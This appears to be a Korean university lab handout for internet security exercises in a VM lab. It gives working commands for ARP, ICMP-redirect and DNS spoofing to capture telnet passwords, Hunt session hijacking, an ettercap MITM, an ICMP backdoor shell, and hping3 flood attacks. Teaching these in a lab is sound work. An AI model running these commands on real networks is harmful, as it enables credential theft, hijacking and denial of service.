인터넷보안 실습 2012년 1학기

환경설정 -1 1. VMPlayer 4.0.3 설치 2. Fedora 12 설치 Vmware tool for Linux 설치하지 않도록 주의 2. Fedora 12 설치 3. gcc 설치: yum install gcc 4. 프로그램 설치 소스설치 : fragrouter Yum 설치: dsniff, hunt tar zxvf fragrouter-….. cd fragrouter… ./configure make yum install dsniff yum install hunt

환경설정 -2 5. 컴퓨터를 3대로 복제 반드시 power off 후 복제 내문서에서 폴더 복사 폴더이름 변경: server, client, attacker Vmplayer에서 복사된 컴퓨터 열기 메모리 설정: 256MB 컴퓨터이름 설정

실습 8-5. ARP스푸핑 외부 텔넷서버 접속 공격자에게 패스워드 탈취 Ifconfig eth0 promisc 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: Arpspoof –I eth0 –t 192.168.18.129 192.168.18.2 (공격대상 IP) (라우터 IP) 공격대상 클라이언트(129)에게 라우터(2)의 맥주소가 공격자컴퓨터(128)의 맥주소라고 허위 광고하는 ARP 메시지를 계속 보냄

실습 8-6. ICMP 리다이렉트 외부 텔넷서버 접속 공격자에게 패스워드 탈취 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: icmp_redir.c 컴파일 ./icmp_redir 192.168.18.2 192.168.18.129 외부서버IP 192.168.18.128 (게이트웨이) (공격대상IP) (외부서버IP) (공격자IP) 공격대상 클라이언트(129)에게 특정 외부서버에 접속시에는 공격자컴퓨터(128)가 라우터(2)라고 허위광고하는 ICMP redirect 메시지를 계속 보냄

실습 8-8. 스니퍼 찾아보기 Hunt 설치 Hunt 실행 Yum install hunt U) host up test Start IP addr End IP addr Host up test (arp method) Host up test (ping method) Net ifc promisc test (arp method) 임의의 맥주소 입력 Net ifc promisc test (ping method) 임의의 맥주소 입력

실습 9-2. Fake 이용한 스푸핑 텔넷서버 접속 공격자에게 패스워드 탈취 192.168.18.130 클라이언트 192.168.18.129 telnet-server 설치 /etc/xinet.d/telnet 설정 변경 Service xinetd start 방화벽 23번 포트 허용 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Fake 설치 : rpm –Uvh fake-…. (send_arp 명령 가능) 공격자는 서버와 클라이언트에게 ping을 하고 arp –a로 맥주소 확인 공격자는 ifconfig 로 자신의 맥주소 확인 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: send_arp 서버IP 공격자MAC 클라이언트IP 클라이언트MAC 공격자의 맥주소를 서버의 맥주소라고 허위 arp 메시지를 보내서 클라이언트를 속임

실습 9-3. DNS 스푸핑 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 라우터 192.168.18.2 클라이언트 192.168.18.129 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 공격자 192.168.18.128 Vi /etc/dsniff/dnsspoof.hosts 위조된 사이트 등록 (예: 61.81.105.13 *.naver.com ) 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: arpspoof -t 192.168.18.129 192.168.18.2 (공격자시스템을 라우터라고 광고) 터미널 3: dnsspoof –i eth0 -f /etc/dsniff/dnsspoof.hosts (위조된 IP주소 전달)

실습 10-2. SSH 터널링 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가 윈도우 SSH 서버 페도라 리눅스 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가 Putty로 SSH 접속 익스플로러에서 인터넷옵션 선택 - 인터넷옵션/연결/LAN설정/고급/프록시설정 익스플로러로 웹사이트 접속 Wireshark로 패킷 분석 - http 패킷이 사용되지 않고 ssh 패킷으로 터널링되어 웹사이트 접속됨

실습 10-3. 셸 백도어 은닉채널 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd 클라이언트 페도라리눅스 서버 페도라 리눅스 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd Wireshark로 패킷분석 - ICMP 패킷을 이용하여 텔넷 이용 가능

실습 11-1. Hunt를 이용한 세션하이재킹 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 192.168.18.130 클라이언트 192.168.18.129 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 - 공격자는 로그인 없이 접속 - 클라이언트의 접속을 차단 공격자 192.168.18.128 2) Hunt 실행 d) daemons rst/arp/sniff/mac a) arp spoof + arp relayer daemon a) add host to host arp spoof 서버 IP 주소 등록 (임의 맥주소) 클라이언트 IP 주소 등록 (임의 맥주소) refresh 간격: 2 x x 최상위메뉴 l) list/watch/reset connections (세션탐지) a) arp/simple hijack (그림 11-11 참조) ctrl+c 로 세션 하이재킹

실습 11-2. 웹 MITM 공격 클라이언트가 외부 웹서버를 사용할때 내부웹서버를 일부 참조하도록 변조 외부 웹서버 내부웹서버 192.168.18.130 공격자 192.168.18.128 클라이언트 192.168.18.129 (1) 내부웹서버 설정 yum install httpd service httpd start 방화벽에서 http 허용 그림파일을 /var/www/html/에 저장 (2) 공격자 설정 1. Ettercap 설치 yum install ettercap 2. Etterfilter 설정 vi filter.txt (그림 11-19) 3. Etterfilter 컴파일 etterfilter –o filter.ef filter.txt 4. MITM 공격 수행 ettercap –T –q –F filter.ef –M ARP /192.168.18.129/ // 웹문서의 모든 그림을 내부웹서버에 있는 그림으로 대체 (3) 클라이언트의 웹서핑 웹문서의 그림이 모두 변조되어 출력

실습 13-1. Ping of Death Hping3 설치 yum install hping3 터미널: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 Ping of death 공격 실시 hping3 -- icmp --rand-source 192.168.18.130 –d 65000 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰 호스트윈도우 Ping of death 공격 실시 ping –n 100 –l 65000 192.168.18.130

실습 13-2. SYN Flooding Hping3 설치 yum install hping3 웹서버 설치 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 웹서버 설치 yum install httpd 웹서버 시작 service httpd start 방화벽 http 허용 터미널1: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널2: netstat –an | grep tcp 관찰 SYN Flooding 공격 실시 hping --rand-source 192.168.18.130 –p 80 –S --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-3. Bonk, Boink 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 터미널 1 hping –a 200.200.200.200 192.168.18.130 --id 3200 --O 12345 -M 34343 -p 21 -d 320 --flood 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널 2 hping –a 200.200.200.200 192.168.18.130 --id 3200 --O 12343 -M 34343 -p 21 -d 320 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-4. Land 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping 192.168.18.130 -a 192.168.18.130 --icmp --flood 목적지와 송신지 주소를 모두 서버의 주소로 입력 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

실습 13-5. Smurf 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping 192.168.18.255 -a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 hping 10.24.0.255 -a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰